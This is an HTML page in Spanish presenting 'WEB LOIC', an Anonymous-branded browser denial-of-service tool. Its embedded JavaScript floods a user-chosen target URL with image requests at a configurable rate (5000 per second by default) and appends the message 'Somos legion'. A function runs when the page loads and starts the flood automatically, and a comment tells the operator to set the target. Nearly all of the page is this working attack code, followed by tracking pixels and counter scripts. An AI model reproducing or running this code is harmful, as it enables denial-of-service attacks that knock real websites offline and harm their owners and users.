<body background=""><center>
<h3></h3>
<p>Anonymous<style type="text/css">
<!--
body {
text-align:center;
background-color: #000;
font-family:Verdana, Geneva, sans-serif;
color:#FFF;
}
.centrado { width: 1100px; margin-left:auto; margin-right:auto; margin-top:15px; height:650px;}
.left {
float:left;
margin-left:10px;}
.van { background-repeat:repeat-x; width:819px; text-align:left; float:left; margin-top:10px;}
.vann {height: auto; width: 819px; text-align:left; margin-left:auto; margin-right:auto;}
.button {
width:118px;
height:35px;
display:block;
font-family:Tahoma;
font-size:20px;
font-weight:bolder;
color:#fff;
float:left;
text-align:center;
text-decoration:none;
padding-top:10px;
margin-left:2px;
}
.Estilo1 {
color: #000000;
font-weight: bold;
font-size: 18px;
}
.Estilo2 {color: #FF0000;}
.Estilo3 {color: #002BFF;}
.Estilo4 {color: #FFFC00;}
.Estilo6 {color: #FFFFFF; font-weight: bold;}
h1 {color:#FFF;}
.vids { height: 765px; width: 640px; overflow: hidden; margin-left:auto; margin-right:auto; }
.embeds { width: 640px; }
-->
</style>
<div class="centrado">
<div style="width:1100px; overflow:hidden; padding-top:4px; float:left">
<div id="loic" style="z-index:10; width:1100px; margin-bottom:20px; height:770px;">
<div style="margin-left:auto; margin-right:auto">
<h1>WEB LOIC<br />
Deje Esta Web Abierta Para Atacar<br /></h1>
<p><div style="position: relative; width: 10030000px; height: 100%; left: -180px; top: px;">
<div style="width: 490px; height: 331px; position: absolute; left: 186px; top: -15px;">
<img alt="LOIC" src="http://i55.tinypic.com/2i7mxcj.png" width="979" height="482" /></div>
<div style="width: 323px; height: 73px; position: absolute; left: 427px; top: -1px;">
<fieldset style="width: 100%; height: 100%;">
<legend>Step 1. Selecciona Target: </legend>
<label>PON EL TARGET<br />
<input name="xD" id="targetURL" style="width: 100%;" value="http://"/>
</label>
<legend></legend>
</fieldset>
</div>
<div style="width: 240px; height: 100px; position: absolute; left: 876px; top: -8px;">
<fieldset style="width: 100%; height: 100%;">
<legend>Step 2. Listo?</legend>
<button id="fireButton" style="background-color:#0015FF; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255); width: 240px; height: 70px;"> Dejar de Disparar! </button>
</fieldset>
</div>
<div style="width: 685px; height: 140px; position: absolute; left: 404px; top: 110px;">
<fieldset style="width: 100%; height: 100%;">
<legend>Opcional. Opciones De Attack? </legend>
<label><span id="result_box"><span title="Requests per second">Solicitudes por segundo</span></span>: <input style="width: 40px;" id="rps" value="5000" /></label>
<p> </p>
<label>Mensaje:<br />
<input id="message" style="width: 100%;" value="Somos legion" />
</label>
</fieldset>
<div style="width: 676px; height: 163px; position: absolute; left: 0px; top: 167px;">
<fieldset style="width: 100%; height: 100%;">
<legend>Attack status:</legend>
<dl>
<dt>Solicitudes:</dt>
<dd class="Estilo4" id="requestedCtr">0</dd>
<dt>Logros:</dt>
<dd class="Estilo4" id="succeededCtr">0</dd>
<dt>Fallidos:</dt>
<dd class="Estilo1" id="failedCtr">0</dd>
</dl>
</fieldset>
</div>
</div>
</div>
<script>
(function () {
var fireInterval;
var isFiring = false;
var currentTime = new Date()
var lastSuccess = currentTime.getTime();
var requestedCtrNode = document.getElementById("requestedCtr"),
succeededCtrNode = document.getElementById("succeededCtr"),
failedCtrNode = document.getElementById("failedCtr"),
targetURLNode = document.getElementById("targetURL"),
fireButton = document.getElementById("fireButton"),
messageNode = document.getElementById("message"),
rpsNode = document.getElementById("rps"),
timeoutNode = document.getElementById("timeout");
var targetURL = targetURLNode.value;
targetURLNode.onchange = function () {
targetURL = this.value;
};
var requestsHT = {}; // requests hash table, may come in handy later
var requestedCtr = 0,
succeededCtr = 0,
failedCtr = 0;
var makeHttpRequest = function () {
if ( (currentTime.getTime()-lastSuccess) > 10000) { //Allow no more than 1000 hung requests
return;
} else { lastSuccess = currentTime.getTime();};
var rID =Number(new Date());
var img = new Image();
img.onerror = function () { onFail(rID); };
img.onabort = function () { onFail(rID); };
img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
requestsHT[rID] = img;
onRequest(rID);
};
var onRequest = function (rID) {
requestedCtr++;
requestedCtrNode.innerHTML = requestedCtr;
};
var onComplete = function (rID) {
delete requestsHT[rID];
};
var onFail = function (rID) {
// failedCtr++;
//failedCtrNode.innerHTML = failedCtr;
succeededCtr++; //Seems like the url will always fail it it isn't an image
succeededCtrNode.innerHTML = succeededCtr;
delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser
};
var onSuccess = function (rID) {
succeededCtr++;
succeededCtrNode.innerHTML = succeededCtr;
delete requestsHT[rID];
};
fireButton.onclick = function () {
if (isFiring) {
clearInterval(fireInterval);
isFiring = false;
this.innerHTML = "Disparar Otra Vez!";
} else {
isFiring = true;
this.innerHTML = "Dejar de Disparar!";
fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
}
};
function Firecolombianew() {
if (isFiring) {
clearInterval(fireInterval);
isFiring = false;
this.innerHTML = "Disparar Otra Vez!";
} else {
isFiring = true;
this.innerHTML = "Stop flooding";
fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
}
};
//Cambiar Target y descomentar la funcion Firecolombianew();
document.getElementById("targetURL").value = "http://";
Firecolombianew();
})();
</script>
</p></div>
</div>
</div>
</div>
<script>var _wau = _wau || []; _wau.push(["tab", "lf1vnhkrsd0x", "38b", "left-middle"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/tab.js";document.getElementsByTagName("head")[0].appendChild(s);})();</script>
</!doctype></p>
<center>
<!-- begin adf.ly conversion tracking --><img src="http://adf.ly/conv.php?aid=56NA0" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
<!-- begin adf.ly conversion tracking Anuncio Cristo ha Vuelto--><img src="http://adf.ly/conv.php?aid=5EHaQ" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
<!-- begin adf.ly conversion tracking del anuncio Proxy Generico de Cristo Vive --><img src="http://adf.ly/conv.php?aid=52yjb" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
<!-- begin adf.ly conversion tracking cristo vive Brasileiro--><img src="http://adf.ly/conv.php?aid=52xSL" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
<!-- begin adf.ly conversion tracking cristo vive Ingles Mundial --><img src="http://adf.ly/conv.php?aid=56Nu7" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
<!--- inicio codigo www.gratisparaweb.com ---><div align="center"><a href="http://contadores.gratisparaweb.com" target="_blank"><img src="http://www.gratisparaweb.com/contadores/imagen.php?contador=44&id2=81" alt="Contadores" border="0"></a><br><br><img src="http://www.gratisparaweb.com/imgs/barra-contadores.gif" alt="Contadores de visitas gratis para web" width="80" height="15" border="0" usemap="#Map" /><map name="Map"><area shape="rect" coords="48,1,90,22" href="http://www.cursosparati.com" target="_blank" alt="Cursos"><area shape="rect" coords="0,0,47,15" href="http://contadores.gratisparaweb.com" target="_blank" alt="Contadores de visitas gratis para web"></map></a></div><!--- fin codigo www.gratisparaweb.com --->
<!-- Codigo contadorvisitas.com ver. 4.3 -->
<script language="javascript" src="http://aux01.contadorgratis.com/hitv4.php?digit=fdg&page=19159e015a01e0fb9028b292dec4cef2"></script>
<br><font size=1><a href="http://www.contadorvisitas.com" target="_blank">Contador de visitas</a></font>
<!-- FIN Codigo contadorvisitas.com -->